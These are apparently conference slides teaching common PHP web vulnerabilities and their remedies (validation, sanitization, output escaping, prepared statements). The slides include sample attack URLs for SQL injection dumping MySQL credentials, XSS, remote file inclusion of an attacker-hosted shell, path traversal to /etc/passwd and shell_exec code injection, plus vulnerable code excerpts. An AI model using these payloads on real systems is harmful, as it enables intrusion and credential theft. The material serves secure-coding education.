Miroslav Štampar
(dev@sqlmap.org)
Talk overview
- Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))
- Usage of code review on real-life vulnerabilities as an educational tool
- Mitigation in the form of remedies
Note: While the given examples discuss PHP code (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language.
October 13th, 2012 2
Visits   Platform   Date
31961    php        2010-08-29
25960    php        2012-01-25
25168    php        2011-07-01
24166    php        2011-07-21
22850    php        2010-07-24
19074    php        2011-05-23
17089    php        2011-11-28
16211    php        2011-08-09
16061    php        2010-08-24
15991    php        2011-08-03
Sample attack:
http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-
Sample attack:
http://www.target.com/vuln.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script>
Sample attack:
http://www.target.com/vuln.php?page=http://www.attacker.com/shell.php?foo=
Sample attack:
GET /vuln.php HTTP/1.0
Cookie: template=../../../../../../../../../etc/passwd
Sample attack:
http://www.target.com/vuln.php?tz=us;shell_exec($_GET['cmd'])
http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd
$page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html");
...
// $_GET['id'] is concatenated into the link parameter without any validation or escaping
$page->SetParameter('UPCOMING_LINK', $config['site_url'].'upcoming.php?id='.$_GET['id']);
$page->SetParameter('POPULAR_LINK', $config['site_url'].'index.php');
...
$page->CreatePageEcho($lang,$config);
(EDB-ID: 12593)
(EDB-ID: 10262)
// $_REQUEST[type] and $_REQUEST[filename] reach the response headers and the file path unvalidated
header('Content-type: ' . $_REQUEST[type]);
header('Content-Disposition: attachment; filename="' . $_REQUEST[filename] . '"');
readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]);
fwrite ($fd, '/* updated via install/index.php on ' . date ('r') . "\r\n");
// only '<br />' and empty values are rejected; every other value is written to the file as-is
foreach ($settings as $k => $v) {
    if ($v != '<br />' && $v != '')
        fwrite ($fd, $k . ': ' . $v . "\r\n");
}
Remedies (1)
Data validation
Process of ensuring that the application is running with correct data. Discard the data if it doesn't pass the validation process.
if (!preg_match('/^\(?\d{3}\)?[-\s.]?\d{3}[-\s.]\d{4}$/', $phone)) {
    echo "Your phone number is invalid";
    die();
}
Remedies (2)
Data sanitization
Removing any unwanted bits from the data and normalizing it to the correct form
$comment = strip_tags($_POST['comment']);
...
$id = intval($_GET['id']);
...
$username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']);
...
$query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
    mysql_real_escape_string($user), mysql_real_escape_string($password));
Remedies (3)
Output escaping
Protecting the integrity of displayed data. Prevents the browser from applying any unintended meaning to special sequences of characters that may be found in it. Always escape output provided by users!
echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES);
Remedies (4)
Safe communication with a database
Prepared statements use one channel for commands and another one for data (which never allows commands)
$db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass);
$query = 'SELECT * FROM users WHERE id = :id';
$stmt = $db->prepare($query);
$stmt->bindValue(':id', $_REQUEST['id']);   // bound as data, never parsed as part of the SQL
$stmt->execute();
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
    ...
}
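Pulling the remedies together, here is an added example (not code from the talk or from the vulnerable application) that rewrites the ticket attachment download handler shown earlier with validation, sanitization and a containment check on the resolved path. It assumes attachments are stored under ./tmp as "<ticketid>_<filename>" and that the ticket id, file name and content type arrive as request parameters named ticketid, filename and type.

```php
<?php
// Added example (not from the talk): a hardened replacement for the ticket
// attachment download handler shown earlier. Assumptions: attachments are
// stored under ./tmp as "<ticketid>_<filename>", and the ticket id, file name
// and content type arrive as request parameters.

$allowedTypes = array('text/plain', 'application/pdf', 'image/png', 'image/jpeg');

function sendTicketAttachment($ticketId, $filename, $type, array $allowedTypes)
{
    // Validation: both inputs must be plain strings, and the id a positive integer
    // (the /D modifier stops $ from matching before a trailing newline).
    if (!is_string($ticketId) || !is_string($filename) || !preg_match('/^[1-9]\d*$/D', $ticketId)) {
        return false;
    }
    // Validation: the Content-Type comes from a fixed list, never from the client.
    if (!is_string($type) || !in_array($type, $allowedTypes, true)) {
        $type = 'application/octet-stream';
    }
    // Sanitization: drop directory parts, then allow only a conservative character
    // set so neither "../" nor CR/LF can reach the file path or the response header.
    $filename = basename($filename);
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/D', $filename)) {
        return false;
    }
    // Containment: the resolved path must lie inside the attachment directory.
    $base = realpath(__DIR__ . '/tmp');
    $path = ($base === false) ? false : realpath($base . '/' . $ticketId . '_' . $filename);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        return false;
    }
    // Output: every header value is now either a constant or was validated above.
    header('Content-Type: ' . $type);
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
    return true;
}

$ok = sendTicketAttachment(
    isset($_REQUEST['ticketid']) ? $_REQUEST['ticketid'] : '',
    isset($_REQUEST['filename']) ? $_REQUEST['filename'] : '',
    isset($_REQUEST['type']) ? $_REQUEST['type'] : '',
    $allowedTypes
);
if (!$ok) {
    header('HTTP/1.0 404 Not Found');
    echo 'No such attachment';
}
```

Note that the containment check via realpath() is what catches symlinks and encoded traversal sequences that a character whitelist alone would not.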
Questions?